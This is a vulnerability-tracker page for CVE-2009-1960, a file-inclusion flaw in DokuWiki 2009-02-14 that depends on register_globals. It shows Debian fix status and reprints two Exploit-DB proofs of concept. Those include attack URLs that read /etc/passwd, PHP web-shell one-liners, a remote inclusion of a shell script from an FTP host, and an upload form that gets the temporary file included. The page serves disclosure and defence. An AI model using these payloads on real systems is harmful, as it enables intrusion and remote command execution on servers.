CVE-2009-1960

unknown

Published — · Modified —

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS v4 NEW

—

not yet in upstream

VIR risk

1.0

Description

inc/init.php in DokuWiki 2009-02-14, rc2009-02-06, and rc2009-01-30, when register_globals is enabled, allows remote attackers to include and execute arbitrary local files via the config_cascade[main][default][] parameter to doku.php. NOTE: PHP remote file inclusion is also possible in PHP 5 using ftp:// URLs.

Predictions

Exploit likelihood

20%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-8781 webapps php verified text · 2 KB

girex · 2009-05-26

Dokuwiki 2009-02-14 - Local File Inclusion

text exploit Source: Exploit-DB

# Author_		girex
# Homepage_		girex.altervista.org

# CMS_			Dokuwiki
# Homepage_		dokuwiki.org

# Affected versions_	2009-02-14
			rc2009-02-06
			rc2009-01-30

# Bug_			Local file inclusion
# Need_			register_globals = On


# Vuln description_
# File:	/inc/init.php

  // if available load a preload config file
  $preload = fullpath(dirname(__FILE__)).'/preload.php';
  if (@file_exists($preload)) include($preload);

  ...

  //set the configuration cascade - but only if its not already been set in preload.php
  global $config_cascade;
  if (empty($config_cascade)) {
    $config_cascade = array(
      'main' => array(
        'default'   => array(DOKU_CONF.'dokuwiki.php'),
        'local'     => array(DOKU_CONF.'local.php'),
        'protected' => array(DOKU_CONF.'local.protected.php'),
      ),
  
  ...

  // load the global config file(s)
  foreach (array('default','local','protected') as $config_group) {
    if (empty($config_cascade['main'][$config_group])) continue;
    foreach ($config_cascade['main'][$config_group] as $config_file) {
      if (@file_exists($config_file)) {
        include($config_file);
      }
    }
  }


# File preload.php doesn't exists. (so seems for the affected versions)
# So we can set $config_cascade arrays via register globals
# It's not a RFI couse use of file_exists function.

# First of all you can check the dokuwiki's version here:
# /[host]/[path]/VERSION
# and check if it's a vulnerable version

# PoC: [host]/[path]/doku.php?config_cascade[main][default][]=/etc/passwd
# PoC: [host]/[path]/doku.php?config_cascade[main][default][]=./README

# Note:
# You can obtain a remote command execution if you can edit the content of a page
# Just insert your php code into it like: <?php system($_GET[cmd]); ?>
# And include it:

# PoC: [host]/[path]/doku.php?config_cascade[main][default][]=./data/pages/[page_edited].txt

# Or you can check if you have permissions to upload file via:
# [host]/[path]/lib/exe/mediamanager.php

# If so, upload your file with .doc extension then include it:

# PoC: [host]/[path]/doku.php?config_cascade[main][default][]=./data/media/[uploaded_file].doc

# milw0rm.com [2009-05-26]

EDB-8812 webapps php verified text · 1 KB

Nine:Situations:Group · 2009-05-26

Dokuwiki 2009-02-14 - Temporary/Remote File Inclusion

text exploit Source: Exploit-DB

Dokuwiki 2009-02-14 Remote/Temporary File Inclusion exploit
tested and working

I was reading: http://www.milw0rm.com/exploits/8781
by girex

[quote]
It's not a RFI couse use of file_exists function.
[/quote]

How wrong brother!

trick 1 (ftp:// wrapper with php 5):
needs register_globals = on
allow_url_fopen = On (default)
allow_url_include = On (not default)

http://[host]/dokuwiki-2009-02-14/doku.php?config_cascade[main][default][]=ftp://anonymous:anon@1.12.123.123/folder/sh.php&cmd=ls%20-la>out.txt

trick 2:
needs register_globals = on
file_uploads = On (default)

include a temporary file passed by the $_FILES[] array:

<form action="http://[host]/dokuwiki-2009-02-14/doku.php?cmd=ls%20-la" method="post" enctype="multipart/form-data" target="_self">
<input name="config_cascade[main][default][]" type="file">
<input type="submit" value="submit">
</form>

where your shell is like:
<?php passthru($_GET[cmd]); die();?>

because when there is no prefix or suffix for the affected var, it remains like this:
/path_to_temporary_folder/php93.tmp !


Nine:Situations:Group::pyrokinesis
site: http://retrogod.altervista.org/

# milw0rm.com [2009-05-26]

OS impact

Debian Fixed 5 releases

Version	Status	Fixed in
trixie	Fixed	`0.0.20090214b-1`
sid	Fixed	`0.0.20090214b-1`
forky	Fixed	`0.0.20090214b-1`
bullseye	Fixed	`0.0.20090214b-1`
bookworm	Fixed	`0.0.20090214b-1`

References

https://security-tracker.debian.org/tracker/CVE-2009-1960

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.